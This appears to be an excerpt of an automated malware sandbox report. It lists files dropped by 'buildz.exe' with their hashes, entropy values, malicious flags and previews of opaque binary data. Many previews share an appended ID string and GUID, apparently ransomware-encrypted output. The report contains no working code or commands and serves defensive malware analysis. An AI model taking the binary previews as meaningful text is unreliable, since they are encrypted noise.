=g0.J.g.6r.......;.1L.B../r.#..1.7/>...0..;.D...T..A.k..;Ld.D....h..%N6.jG..!..Q......h.v..X....4./3.&R".Jb....DJ.uE(.Xy.3......&..*..gN........G.)....3f...../-.t......`C..H...ZY~.,-..xs.w...IS.KG..J...Ej...T.|5..[.].../..8........T.9...N......dA0...8?".i<......}>.4..U..R....t..^..d7.k..6...?.t.'.T.I....%G{1.,.C..Q...Jw.3...W..f..g.F.S..I.....B.u..M..q.C..|o.....d.r.uMIP.{..1[..S1..1..[..u.a.D......l...j];.`....x.\8"g}..j-|'..g....|'@o3...0,Toy.%.....\[.6....Fj...+...|NB%.Q.{.&d.h......"..B..~....hM#...s@A..l.8.`).O+.....4N.Hb>N;.~O=.xX!K.n.t.m......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):770
                        Entropy (8bit):7.733298250109843
                        Encrypted:false
                        SSDEEP:12:T15+ALrO2idd6SCV8fU7hj2GbaIxLkMkNJaJuIU9o5uxqDemQtpX6XI26Gcii9a:jL62iD6lKfC6HIxQRaJuP96De7pNGbD
                        MD5:C727E00ECEA0D87380723FF7F9201033
                        SHA1:F2CCE952FE8DC0A5599014B00721D1B5E0CE88C2
                        SHA-256:1472E189165CC129C3C75D902100BE6B3BD4F6D5D47B834B52D90D47D0A2A764
                        SHA-512:F0CEF4E6888870D4D09843A3CB5E9E22F8727892262C0D7ABA32C0A8EA56FBC01044935B283E2BDF6ACC10088D6F2D2F5B0F3F12F5249426F31B6299918622DF
                        Malicious:false
                        Preview:....B#2/.2.2D........A\.F..l..K.".......K......z.?.*C.3..zUm0....$.qz..x.[.C..s....%x..._...1..2..uZva.7.8..!...s@y..8u...Q....{S.......S..CJ.>...6K..........<.k...wJ.>~..Z...F.a=.._..4"Q.v3..V..F.s......$......w......'.M...:Ocs.........U...U+[.~.)..B.. ..U..oo.....$.T~...}..F....i.t...y.*...j_*.@uc.f5C..}JQ...3...-.......k.........}...w...u`y.x.1...{l....:>:..?.T.........N.Z..{.,x....E..../**@W,K..W%X....4..M.K..i=R.%.U.....v.R...,.}...O.:.I....t(...T...y.X5...W8.b..zwY.[K}....X..*.....;..N......Z...T....j..?1......2....P....\....;....C.r5K.'..].........[.#]lr...._....c..:^.7,........5.{.x.....?Kw.'.<....gX.I..46..z.X.G.Hs.G.x..{..Y...+.[EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):424152
                        Entropy (8bit):6.332608235689067
                        Encrypted:false
                        SSDEEP:6144:AkMLApuqk5CqTTj99wdm+vyJfbnQkK96B88yKv4bWTmTvEiLS8:AkMLmutFb96dm+6dF4/b
                        MD5:D64017BF9F3E6178BA6AC09EE2F124B4
                        SHA1:AE9EFBB2733BD4EA2552DD544BD2801DD780F3DD
                        SHA-256:BD3D59395359C00C110330B414DFE1990E79A5F99C33808FB2D3E3DBA27C7032
                        SHA-512:7CF89E43C74E0B9C91F4997AED634FD32329CA24156C1921C95752BF60C14DB04A917EEC67D4DE3774489BBF339E7E8B495F83F8CD0C6659C099CDA1DCB25D24
                        Malicious:false
                        Preview:...P..>.Z....]..s*..........f6........7..bp....@..i/N...P}.[..J."1ECC.~`?m.Gi.>../....,.cq.0>.............=.5..?.....1.)..(.......O.....l...P..........C.%.......E.7..........D..-].!s..QC..v.b..p..7.b..$.Q.>/..Q.... .UB.y..,.e..3....'!n...t.B.|...n.d...f.*.....P3..:p.....R...<.P!.....R.Z.)........f.`..........F>^...1.ue'Z...O...:u&.....3.5.......w.d... v#^a....==....UBQ<9.d.7..a..r.J..jc...z...s..u..^.L..&.x...j?......s.G.o._.,.*.K....JG.G".;<...{..W5M`....a...s...hg...H.z.}e:..r........l.F.2'.../=.Xa.*....}.......<...Q,..m[x"....(q4...-...%...t.3k.x.....7.........{...MO.....[z....u....&.:t:...2...B.a.7......8RO.....;.D.ZM.3,l..M6$q.hec..-......g..EzS.2...#...A......k..&...HW..._u5v.8.>.P..Z0......Q.....l.jqH..Q......P......5."....v..e.E.4CI.]M).\}.y.}$.a...........N........-3t.6.;.srmk.S....2\.7T..+.r..)3....V........FiN.c........Np;...t....`..\...CF.w2f.7B]..d..Q.....)V%......,|5.a....y<........I..?...EM.g[T...e,.,..*Z...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.989616320775836
                        Encrypted:false
                        SSDEEP:384:l6VW/2QQZQV1bLWNGuWVcgSBZEZS9hFrWGc0rfEm82tA:kMQibLXRV4ZEw9/5tA
                        MD5:B05C5A6B3A742570F76D1F0A95A04A74
                        SHA1:E8FFE37F21D4F8FA65E6A86B58728EF0D7906EEA
                        SHA-256:DB6A97328D3F1F81F3ADA40B0121B0C0F34BA8554EFCC3644A2B41B33AEE5E66
                        SHA-512:F764A84F57127558D60A5FA3BEC13A864534B12D9BC56F52672923417C1D203BADDC56555263FAE4276F184DF76BFDAA08111346552BF500293FBECA6EDB0F34
                        Malicious:false
                        Preview:.... ..Y...c..Xy..q-.})(.(.{e.....oR..I..K?.$iK.j.F&8.R+s.C.a..)..J.J d.(A.3.k%.V.CWqF.Hq......./..a..I.6..,4.w..W..}.9.39.9.......i.....{.6.....R..6._..2.>}.?.=...~.-..8.e.2.e...Wu..X}/.P..}....i..w...Q9.a:..u.^..e........~.q.........$..$.>p..Nq..x.TF....KG...J#.H.X.a..q ..J..... .t.+....|F.y.K...$|.%.}.5\Lf.Y.m......gWR.e..[Vn\PT{....@.....3..).9.pP]5.&.X...@&.w...h...U$.\.|..{...})68..Z.t....X(.....ND...W.../z.g.#K..Y. ..8~....1.....t.o........2.#8.e.m_.,r...R....OB3....1j.t*9....Z)q9.k....*.V....9..Py.c..X.k.O....R.m....B......s-l.....{..]....HP~..~....0.}...3..@..0[m....J...y"3...3.w........\._1.ro....b..Z9.n..g.....?S...B{0"V....R...........aZ.XM.`'..U..H.o-.Q..Y..qr..9P..~:t..FM.........R.U..i....b....i.^..\...G.^.....A..%....t.H8...%..fmGNL....x.,..)..g...._W..=..I.S4.h/.#.L.5...=.......=.....~R....a.+\hp....jb48..~....Q..-H! ...J.[.go.ZC.3.b4.].Y+...XX.N....w..o.mc..YC......N.@..t|...C.2. ..;N.,..R..c..K...........m.W.....b.7..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.989156185454213
                        Encrypted:false
                        SSDEEP:384:kp2+AqUH7erhOdKY0ZHuGI8bgYWRfw7t5l8F5VuyEnMq1QvmtdO+Q1NSnRA:kpAqUbu7YGIvYXtk5McsnRA
                        MD5:9FA17078460D770EBB6B235A0DFC7980
                        SHA1:B80A4FEBAB6DFCE333568E990AC8F49DB3D91507
                        SHA-256:A2BC689283C248E2529E31FD02D8ABCB1615615B75C9D2C0E7A6B85905138B3F
                        SHA-512:8D9449909FC6A3E9A1FA54C6FD8C713F60621EF78DA72CAC330BB51F305D40638AC0E8F92ED9DF8F4A21EC78F14230549C943583A01694587AFD9F932C815667
                        Malicious:false
                        Preview:....`.\....g...aE3l.w.p.....k.N...k........bt..K.......QF...Ns.L...r.U.Q......-$......:..T.d...aF...:?d...3u./.LE\..%.t..-.27..Tx.K._..[.t.....|t...*.s...EIu..i..P%..Q..xF...:...&....t.aS.sr:.....Z[0..4.s..v..&`....&u,.d..-D.h.W.:.....U.....^.....Dm....G..l')\...z.,s=...9oh..-....W..Y;.b...Oz..R..)ZMm$$.tX...$..o..G........1(..$.:C.e.s.T.rd...K....s..+4v?Nz...]F.ze....|.....6?..4<..C)z...(e@.....?i%.tt.....:4`;u.mp.r~..V...@..w..........m...Y.t..~..6......0....n .c?.{..c..ehduW._..V.lH..Z..'Z.k;P>..h6..m.........C..Q.e.L&,C.N..U.Z.1}...y...... ._.......@...4.N..^e.{..[........%...:g.{.J.. @].....lg.d....<....].T.!.......c+.....X....X..e...U'..%.S..W..U.Im....\...~.V.sK!Ws..*.U.e.{..S.....X...{nz.6.............Ci.=..\`1......a.._....A.....N......w.W.s.......MT=..r..K...0M.3...YX......bs...J.}(k;e.....E.IB.....\G......C.2.. .IJ.J+..]w3W..s.n.....K....zP.......E.$rd.x..+.8.>Z.M.#.N.y/..~W$9.J.\.t..J..k=..(a._+...S..;A.v..:..GlU....w.....v..+.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):424190
                        Entropy (8bit):6.333169080119171
                        Encrypted:false
                        SSDEEP:6144:Op82tmZ0x17+SWl33+qti1k5T+m+vyJfbnQkK96B88yKv4bWTmTvEiLSW:OW28YoR3u51OT+m+6dF4/F
                        MD5:B7CB17D553371217390F2CA5335C3231
                        SHA1:B859865E8B9F159013D61B9F0CE300A382A980DF
                        SHA-256:EE96D7C4571811CF0EC7626F1AC48114456DCC2A41F1FFB73695B53A3F78E766
                        SHA-512:545F7216045AC342210B9B527BFB11F5E1C07DA5422955A722E5094005CBAA917ED064831387F990CD92D1904688B2F700FF55BC8DDD9F687BD5A28D59ECB7D6
                        Malicious:false
                        Preview:.w.. ..o.......!{...Y.r!.5..........[...\$g]y^.H,&.p5}.u....M6'@.M...+.WZ..1...;........<......).6.S...].X.F.../.....Cu.t...XY..rt.......N....(....I,...oPH..(..W ..!U....{2...{...5.Up....dZ...:.x.Y.i...'...O6.P.OY..,.>..a...N..6...@.0Q..&.h.....I.n..x...P.0.B.gU.Q....ta.la..C....3.P}.K.!%...46..yv".8z.).}.. ~..j~&....-....3J.|...w[Q.T... \...w.V.r...f..K./Y......u.f|..k.T.sq[q..C......'..u....a5~......uF...CV.\.......@.Ql.=...l[..j..g...,.~u......:.\.....0E.y..{.....Y.8@...0......d...L.E.x.Tt8|..o....o..5y[.B.o..v.....9ie.a...r.?...{.j...1...l..@iRq~*3.B._!]YF".....gH...z.'.f.....3"..;6gH........(...Vc..t2..r....$y.....D.....n.5..,+l....X.m.}X.r*...o...ze..k..8.........b.8..i...s......h.&c....Z.H...*.....~.6.qI.F.t.k9.v.v=\..+..|..._D...J..{H^.)..TA.......v.X...../.E./Rour>...Wj.n."tldb..}.VL.rX.S7?....J.pi?.>...Ss)b.L ..g..N.....".s.k..G.J.R:......b\k8.$.S...].Oh..%.A.<.s.t..C.O.$.]......Zm..u.2N...)...b..9.Rx^%...D.Q..."V.tc'......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104062
                        Entropy (8bit):7.998090416324751
                        Encrypted:true
                        SSDEEP:3072:YFaknsTsnA62FHx9c7ARV4SI+VK/WxUEZA:YIAxx2dc7AUF+4DEe
                        MD5:4D72AED57C94B3322ACA03D96ED096BA
                        SHA1:3B466CA4E80436C7FD8CAA9DD2C42DD79BEC3886
                        SHA-256:90967973ED65B28387068F0B73E0FA2C7B39BD92C8F0BCCFE44A64A6D310B1EA
                        SHA-512:B78D4B6351106FD3258448811CEC4B9AE14427FD85513AD39915D4DBF975EDB75415F2C4ACB87419DFE9F2BD291FFED4A84DBC68DA04096F9849014B5BAB53CE
                        Malicious:true
                        Preview:....h...l!..[z.m..._..`bm"\...e8....l.t.....h...Y..q......[T.!hI.....kG.....D...[....V.;w ...`{+...<.J..e..!....;....}.......Q_M.X$B$...i.tlL.o..|.{H.l.....a..l.a..!-5..V.wM$o...n..S.......F....8.N.1.._...x.....f.........e.w...:R;>GiyE.3..2....DN...N...N.".n4.c=vE....@.1g.u.H......3..&p...B.,.E]Z.Bn..1y7G...WJ.\V.m).P..^A.Y.U.....8[^...SGE.>9.....Qi....>b.m=..^H.....S.M|$B;......#..:...y.zQ..5(...}..1......q..R..;..............M;..!......7.......G....u...K...7.ae..d.zE.D|.......B.w...gR.....a......g....@...USw5/.2.g......K.w.<.3Tp...._.......=..Q?.&..].........P...."..z-=..._9X.ni.o|x.X.g..kZM./U|R....[.G.N...p...P.['.V.Q....0. xk.c..u.E7H~.{X........B....@../...,....n..@..(...%c..f..;.2..-.Y.m.2...........jHB...h.....&..5.5.~.....g..aU..`.9F?S..F.....{..7..KD./(a.gt^..U...t..hS.].K...D.-....\..)...Vj........J....l...b...nq`....r..K$Cv.S#...6..rC..W...F.@......&..l._...{..k...i.v..T..u....{..:....O.z86...X.P.._.l....vs...Io..5.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):102814
                        Entropy (8bit):7.998106595806861
                        Encrypted:true
                        SSDEEP:3072:nZIEG0CfaI5s9qSCEph9BVZeZ22mVQLhIwBEA:ZI5ZaI50CEph5ZeZ22mVQ1ImZ
                        MD5:79A477B6774AB302DE19DDA593247578
                        SHA1:9E2285E3BEAE469CFDD3C1201ABE6B7638AEE387
                        SHA-256:6EFF8CA355A0486CF01FCA24D495076370302950032877E6471D4F7F86B71958
                        SHA-512:3B5ABCE6446A80EE5AFCAA1593C1168D8C6DEF071C25B11B46E22AAA0B95BE172E6354C6B6ADB853137CF6A1B8EC25BF5DCDDFCAD0C8A70FEB800240C3E08BAB
                        Malicious:true
                        Preview:....h..r.Q.........><-...D.s.....$..2..../?.h+.b...?.J.=`.l.J......:.k... ..P....]<.S.$=a.... .a-..xb.C.".E..{.....0wzp.\..(7..E.R_`.......x.[a.:.\...z%..|G.2.3..H..f.a..z...vO..'.....+5.3aUQ.....mn~./. Q~...........b..xG..TS........qt...7t.ap.....$L...X...@`......x.#..C&>.....u(.;..@.<D.!<....y.V......jQ.FNg.*=..Q.Sf...&..d..d.yK.#..=....,....W..F.|.S..N....x.H. .a.f....v..K.dv.h...;...mx;0..Xg....L.ax....={..Q.KA&....o..?R.A.....<.=/.n.Jj....$}.e..z....><|\...u;qZ.....4........S&{.4.d~..N.R..Y.:.E...>...of.4.=h.r.H..K.1.+.#...U.....gZ.9.......Y...(4.h....L.xl.%..t...:....LS...R............d.$].Yi...E.(..."..7.../(6..g...r3.....,..f.Y ......*sa.'...6.s.{]......J.u....Q........,.`m.=%.:.......y4TlM.#.N...[..t...b._.i.......k..6....O.X.....^....J....L.=.K=.O......2..]...8..+.Y..Q$......p.".Nou.......`[.y.3 .J.!..Y.. ...X..M_.v3..I..X.g.!. .~ ../.......yM...cJ.m...m..j.4.Q...,...0.E.~.Ip6,!.W..a...,.~..N.....`T}....@.....D...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):75398
                        Entropy (8bit):7.9975563561727006
                        Encrypted:true
                        SSDEEP:1536:LAhdPBXM+FXXBAODUPjyw+KBgVKjrBO4rjltI2dmGceONVc669eA:LA3BXXxbDU2ZXVKjrY8lqYhc46AeA
                        MD5:194D81260BDBF1271546584FF0CFCF58
                        SHA1:83E75EE0305A3EEE6E5611CC2779AC8D5633F625
                        SHA-256:2E666182DAEF8E54A147B37FBC3778160EDEEB1A235AD7DD5C6200564BFEBF2D
                        SHA-512:85FBEF5AB1E492AB0C44F75CD61D9CF9D1BCDFFD33284F41ECDEAF1C0E62E536B959782B4C432BB36454B2127E6DFB93C822D23263C7FD849FB034B6B2CBC63A
                        Malicious:true
                        Preview:......n....c......?..O..i;..X..M......RtXp..1.+'.7..L....31B.E.2.{.<'........g..).7...>..d..I.3.y.D.j.is.w.(....o.7!.....%..#b..}....KWDLN...w .2..-On.....'2.'h....w...(.?....v.....~.xOs.[.#.....9.1i...h./....Qk~z.`....M\((.&....jtB.&..}.........4.0......7....5*XOH.@.5...5.A...=.0,.3.|f..{...:k.c.........J....t]S.2..^'o..*n.....'o....Q.?..s..*..N...N........Q.~j.j.<...8../.p...k.....d...O.|.....($.. .:d.=.z.."Pr..T...D.o..h.........w....bCU-.9.]s.Wf~+#Te........~..z].Ez.._q......-.R...+.0h.'p...8..%c....0...tU.p.D...&%C....2n...g..[.{.5.qW..~.......(.6...G ....sa.^.TSY..STc.a0u?.....V.4.}...vF.^..|.....s b..~%..s...F....`.|...>..%..jP@N...6.'..D.w.S.w.z..Z.(-G|.E~..eG.BML.hPr3...y_..:..py.}..\r.;.v....#..".>...}.. S.C...}.$.....P.N.:w..j.L.a.4.;.x..d.....,..".`..K...%.:.hn...........#Mv.)8H..j.wU.a=...^.e.p.S..6.._.....I..E,.G....78f...#...9.+B.R4.F.b.).8.W#B.[.$.@..&..d.e.mk.%6.}/$j..>.Ez8;y_.*...g.e\....%9..kU..._^.......h@n...aW......).rW....I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105318
                        Entropy (8bit):7.99820020089109
                        Encrypted:true
                        SSDEEP:3072:B/MjfQ9WVK92qP2Xc71GdMHEQJYwnZyJpA:BMjIjsK71KMHEuYwnQA
                        MD5:37C95AECABDCDE8D4A99AA8C3AF0CBDE
                        SHA1:7928B126D9E10EDB2A30FA2488DCE44F1EF911F6
                        SHA-256:B1DA60D938D4110424BB8C1C4A1C8EEF3736A84B5C40A93296E511707419CA39
                        SHA-512:4CC42828716CA87EB67BCEFAF0D1E974665BEA1251D44E1CA33F3A3452C5AA636E5BCDA1A3232D1E99FFBB13217E854BCD75EC908B6DACF56FDC9F713A58A6E5
                        Malicious:true
                        Preview:.... ........'.d..knw..x#}.^.......j;.c.P.......Y.R{;.........".7<....PG<..>...W.[.5w\8`..F..........bp.../8..H[.5.H.i.\)..!..Y.4..WE.d3"..Gl.y./.u.#..v:)...Tx..G3D...1..I1?...].t%<U....$.So.9.,sWM.:j9...H.....y;q.....E.\....0.,.{l.n...'...G..{....yhc....yO...W......U.]#..r+s.!gCb...\.'..e=H.;.o..PAJ..._...tQG...}.....Iv..m..3.9.....K...{#1r.el....w..{w.hh>..6C.C.1/wl.....E......`;;......~:f...W..:ER.!B.....@1.;.C]...Pv.9..../x.....s.d.!EO..&.b.\jt...c.OX.:*o........_...py...r./W.+.m:.........[.z.vI_H"..X.^...L../v....tp...}..}).[w...l.90B.y..y.]..."..y.nNM.u.C..n.Ke.....]...A.$..]\.4Vv.."L2-.5.F{3H*.-.(...-..,....c.P~...Z..Y]...|.F..un..='p[:.....o..iq.^{....c.T.IO<..3....z.....OQ...&.&...*..\.G..=E...+J..>.8...{y0.6..6^Oy.....)...Z..:.1....$....D.,Cp...2."$...j..../.....D]..v}...ASn......}v..}!I.,........x|6....z..........X\.p..b..6a}.....P.f..h.d0.c...j.=v...W.;5@$.w........Y<.i..@...B.Q.......Rq'9...\R-.:..].j..}Z.......;.|....:D.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):581966
                        Entropy (8bit):5.738469265656969
                        Encrypted:false
                        SSDEEP:6144:Rnve8lOYWvjqWZynzd0M6FiNa1mYSOb9x:9W6WvpyneFiNGmpU
                        MD5:9BAAECAB796913FD6BCA2D3B4595E7F4
                        SHA1:EC9BD25299F799D55B3423962964AB2192D17056
                        SHA-256:992A84021E3BEA5D62C754D53EC3D4FC54FC79BA39D50D1584E6BB9ADD356BDF
                        SHA-512:9C17932F736B394F7DC40B1EB5DF2F45FFFE0C0D2A4F6DB1FB10B2CE1DF101D990B602B08A50B6F41320CE8C0CCB6F3A193DF77CAD65F16A65981211F4515DE2
                        Malicious:false
                        Preview:. .......{...P..;.Q.'.3..|..R.V.!J.6..5y8_....H......P9MZ._.-...A....dNY...t...b..A...w.a..EK..^.."O...i...s..>...pW.<y\6.s`....|.../..R^....B?; .^...)>...0.....&..FD..u.$2.U........|`.h..E!c...(...!<ohuJ..G.F,. .uHz.^.q...@...f....a.Wd..h=.....N./..HpZ..i...^.*yQ.o...Mg...s<.v....$V{+w...8.$y.5..N.../A.Z..'..~...N....0.W'.p`^`.......xm..+?>.....z.-..u....F4.. ....]...x.sV...:..n.g..........O.w..n.|.,....5+.....S@q....Q.CuP.5...63=..N./.;h...gu..........ii..I...%.1......f.c.o.e.L@.k.xg..y'|.....NyW..c.....q%.G8.#..'.T.q#?M......Gd..m^W.._ .q].-q.....N...2)..F.....|.q%.....w.h..45..*..g:G...%k......_...&..)....eZ...4.....d.D..{W<...W......D.^.b..*Y..1.jPc...a?F".9.sX.`mT1.....K<d_o.F.Z9B..g.U..C..........[..z_.....s..(KO4.x.+.b.v\g..}@.C....ij]E....gV..R..........SK.V(..q......|..6v.....a....".N.E}....J.'G.r.:.c..E.J...J.{`....1`;*..$.3es...v,^.5.s......\5f..r~.6.c...{.,.f:.<4.S...$..w...>.*..f.D...b#.w..'.?Ih.&..W.C.5iO}`.Q.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.9931908111340055
                        Encrypted:true
                        SSDEEP:768:DRv3G0TQ9A2crfbKBF7yQv/DyWBZg8M6jtHYsF9uA:NG0TQfk2fyoLVAIt99uA
                        MD5:10FAC53A417E9A4E8CDBA32DB0A99C32
                        SHA1:54185BE61AF0D0862E8B13055A8FCA5F21BDD9F3
                        SHA-256:DF21DCFC9D52CA0A14FDA2A73655ED60571F22F93DCEF2BC75AE2AA749090D01
                        SHA-512:3E22CA392A9DB66DDCB9F824A8FDD9BCF2E9F3E08E4D62BE1B0CF32512ECD0825F3B899636B42EABA5E632BB6429EFFCE9A0677C0BBA5798442A0CC12A30E860
                        Malicious:true
                        Preview:. ....~.....m..z......E.u.W...2.H...{.qGt...C\....fg.e*.+3s.....9.+zeli.a...M{.o....ao.9.F......{!..B."D.5.....7.....HWAh<.J.s...d.\.C.f.$.G.:.tk..y}..Z|...N.t.....m;PU.lAGi.........6n.ui.W.M>.{.R.....dZ.yRC.'.'T.`.Bp<....mn..o&@....I..........].`c..... .~..X....z..2<....vMF..Dr*N.`..f.8..\..GK*_-.R......@.jgQ...U.e..ud.....h..\j.....w...u{J.ZT.T'...@..S......N.N..(|W..1Z.".si.7.k..C.<..X\ud...&.9m.%..WTd..V.~../..I'.F.YQ..0....J8...^t.xx]2*.Pj.{R.....:...m....D.5l....rf..l&.w.S.z..N..!z.XgJ...M....2v...e;..T:....z.]h'.........e..\oE.~{.....g"......&h..................o`#.?...$E....n.3.P%.....-...qK.hBB.}}.......\.r...o.uZ.0q.r...^.. #.tt .._.#.............a...+\o....,f.g...6..g..uq ....7...b....*....C9tt.....[..q_h....}.6.G%..9..C..P.4;.....k...wt...A ....Rpm.t..........K.Z*G.{.M....zd..J.N...[..#...s6...Y.XN......k.;@..r2..]8.Z/4&D..c..E......}._.%......)....DN5E..@....z{.q.6o@.........e..q...BMXh.)a...n....N.U8....7..9...4\..1.A.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.30543915475454
                        Encrypted:false
                        SSDEEP:6:UM40C7fEyZzG/KDsFZi7Xi2cACuOznrnOCkFtZ+WAGK3BFMr8FGcii96Z:/40SEylrAKDi2c5uOzbfqz+jBF26GciD
                        MD5:3558A3EF8A9188CC8DC55FDC474FE23E
                        SHA1:4C127463BE13EC66479B23712DA1B01956C74697
                        SHA-256:AC8C80773B839434FDB7A9775ACFE7331B8FDBE89B8B6B98FE002D952C3B6EC6
                        SHA-512:138F18F9DB0405DB8D29CC0E805B0CC6ECDA9DBCD6C751D21F38A012352DC50161C7CF760413F379EF0BD7F7E9F1FE548ACF887C58CE64AC635A9057B593D6BB
                        Malicious:false
                        Preview:CMMM ..j.........:........|.......8Q.9[...H7.u..c.6S.7..E.j..[f...Jd:...Or~.v...c.......*0,JE/. .\..{O.L....4)osX...:-+..m/.8..l......Z.d$k....q.>2w.....+W...6r....3...}.."HHEW...(.j7.i..........C..u#.....t..1..5..Y...1..Hk....._)..f...@.q...U.......=.5..d.d.56.d.;.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.229056534732344
                        Encrypted:false
                        SSDEEP:6:9tX1M0VJXfVY1IUjbdx9w+Reki4pf/V4jaQh36fDc4NCSYeSC6fjMr8FGcii96Z:9x1hVHTA57iQirh36fDc44S/Ofj26Gcq
                        MD5:1FF998B72F5A1831BA76DF42F700CB8D
                        SHA1:324DFBE9D261EE59EC0969A03575C64A3322CCAD
                        SHA-256:041F051ABF1491DD198677EA4A459C1F1A4E5F586780E8E2C3F2F5F37D3F4528
                        SHA-512:848CC235FCAEB238F2B6A1B5060E0DA382DF043FE4921375C5E95C10C21CC38F51F425881E6DAB7D90FCB863907799F818294CE13D02E003D88A66CCA57ECC41
                        Malicious:false
                        Preview:CMMM .....:..<q..`....p.b........L.......p.n...q...\7.t......w}.....D....|.~..0.....p.....LO.c.h.VK......NM.+......?...`B%^..c\r.n8...H..]..7....7..4..^7pO.{.....0%w3.,..c5..7ZT>.n..m..4.....Wk..W....zb...<&r[...[......6..f.....n..gjV.t.w...%...U....V..........w.M.x]EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.317961919671782
                        Encrypted:false
                        SSDEEP:6:Stw8XNmYlo+i+eXJSz5pKLKj+Hn1DKkz+tp/G8BoJw9ydWp0ecrks4Mr8FGcii9a:SzNvloY6YtpQ71DKkaGZ+9YkH26Gciik
                        MD5:CD87FDEACBFE440E09140A76B483415A
                        SHA1:F474209C5902D1B67906E2C270FADA1E5F648275
                        SHA-256:86193E673F2E2E62BBFDBC82A3F9FE261E5825DCBBF5DB63535D2535CBC9F657
                        SHA-512:3C6FF24D81A9403FB9F4543568C383D8B492BEA1DF71FF148992872351ACF9DED93327BEF6825B99EF72EB2009FC460CED0CD296D9116ACC1BA942D707255B83
                        Malicious:false
                        Preview:CMMM ..e*.D.t.......<2ir. 7r.H..w.xU.IaGH.=.....O....@...frn.8l..O.vP....,..........uk~..k....k....M.d...q..7....o...HDr....A........|.2.`....X...Vq.....S..P.Cy......0..H.y;'...k.n............k..F @.o...# d.m.sc.[.)Rv....Yi....3.+`.o.b...._.....{...>..3........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.238505294046434
                        Encrypted:false
                        SSDEEP:6:QEtH21hcUvhjGiiZ7JgaLY9fyf4kBziUA1geM6Aru/cU/Mr8FGcii96Z:t2TvhWXgl9fJkBziUAZM6Aq/l/26GciD
                        MD5:02E8D12935A11B6B209282EE851436AF
                        SHA1:DC815A5A413C1A234E5011175791BFCFE1D26459
                        SHA-256:9E0381643B81E02BAE7310C928660B7FAE6E45DA6D0C3F1C2E8D69022FF8953D
                        SHA-512:EDC79D1DEDB1BB67C8AB0D63F587156BFE25CF567541DD05860901CD692C984D5660672230967153DAC020FEE5AE4FA5F17D67DE034696177024FAB18D5C9888
                        Malicious:false
                        Preview:CMMM Q|..Zj..f..N..?.....\&Y i\..7....u....\....8 .....L.......i..]........wj..Y.Q.!..L-.s.....F...}.Oq..........%.?B...{.G,.`....D..-Z.Bp}IS..:..8...........).@..O......;D.. ...7e..D..r..'..wr[.J...m.....WC.#.=....X\`;d...tI.0S.w:....Pz.UT.....c.C...D..4C.I.DS.'.<y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.29501291584155
                        Encrypted:false
                        SSDEEP:6:eSt01iN7UsTW0j6bfF6P01ViJnDmiwD3O+vzqBIMr8FGcii96Z:5Is76bfF681w9Ee+vcI26Gcii9a
                        MD5:699409D804AAFEC85530B2E065601751
                        SHA1:204E37B5CDDA25E47875385D849362F111A7FD9D
                        SHA-256:274AF7C1159D3A0F537C13764E1AC696A9D0D654898E635CC16317B0171B6C4F
                        SHA-512:2B2394D89980159AB98ED97F1F76553D495E555B99264A2790E1AEF17C55955BC6CC4BCED0E23CDE41451B6FE633760CF3015CD21D6EA6461930F6807E26A7BD
                        Malicious:false
                        Preview:CMMM .......j(.D...G9.e.&....A.W...E......Y5..R.:Z..F..k.K$}...e...q.....&....v>.Z....8.....M=.Q.t^z.d.3.V...).c.A5......2..n......[..'V.Or.|.8`..`A.q....@...+..^].5......gZI..?...t....4. 3Z..!.....=...8.7.S....M.t.Bd....0M....B....*|.\.a..+....p..r.KQ.](.."4a.....~EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358
                        Entropy (8bit):7.26642292553996
                        Encrypted:false
                        SSDEEP:6:08A6ZSqwqOustLKadyNCrCkBsqs/fMD4xO2rYUIYXnKuUV8M33yFMr8FGcii96Z:RA6MqOushy0ukB1+O2rYUIYXnKuU6M3F
                        MD5:91D3F865850E8D142629B120D8A8DB36
                        SHA1:46B8E353218D5DABD86EBB6D31C294CC4078BB41
                        SHA-256:754CF7D9F3BE74022780F90633A5D5D241BEBA2B3166DF2F3D154FAAAC97E7DA
